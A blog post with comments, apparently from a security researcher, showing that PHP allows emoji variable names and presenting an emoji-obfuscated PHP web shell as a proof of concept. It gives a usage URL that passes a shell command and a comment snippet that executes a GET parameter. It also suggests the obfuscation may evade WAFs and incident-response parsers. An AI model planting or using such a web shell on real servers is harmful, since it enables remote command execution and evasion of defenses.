I recently came across an interesting behaviour on PHP. Apparently, PHP permits the usage of Unicode characters as variable names. Therefore, friendly emojis can be used as a PHP variable.
<?php
$😶="Hello World!";
echo($😶);
Output:
>> Hello World!
Which is valid.
I thought about making a fancy example of a PHP Web-Shell using emojis. This is made for entertainment purposes, no real advantage is gained by using Emojis webshell. It may disturb/confuse a WAF or back-end parser, but it’s not confirmed against a real-world environment.
Usage
Usage can be as:
https://example.com/emojis-webshell.php?👽=pwd
You can create a CLI for it to do more; I am only publishing it as a proof of concept.
Haha that is pretty fun. Could also break some IR tools that aren't ready to support Emoji/ASCII code.
ReplyDeleteYeah!
DeleteI expect this too. I haven't tried it against security/incident response tools yet. I'm sure it will break the parsing of many.
This comment has been removed by the author.
ReplyDeleteNice technique
ReplyDeleteThanks Abdelazim!
DeleteNice post!
ReplyDeleteMay I ask a question? Why do you run an `eval` with the result of a `passthru`?
Thanks Lorenzo!
DeleteThe reason is: `passthru` is a command execution function. It's obfuscated using the emojis technique discussed.
The `eval` is used to run the resulted PHP code.
I know `passthru` is a string created concatenating the emojis. Does PHP execute the `passthru` even without the `eval` command?
Delete@Lorenzo
DeleteYes, PHP can execute it without `eval`.
```
if (isset($_GET['👽'])) {
$ðŸ˜($_GET['👽']);
};
```
Will work normally too.
This comment has been removed by the author.
ReplyDelete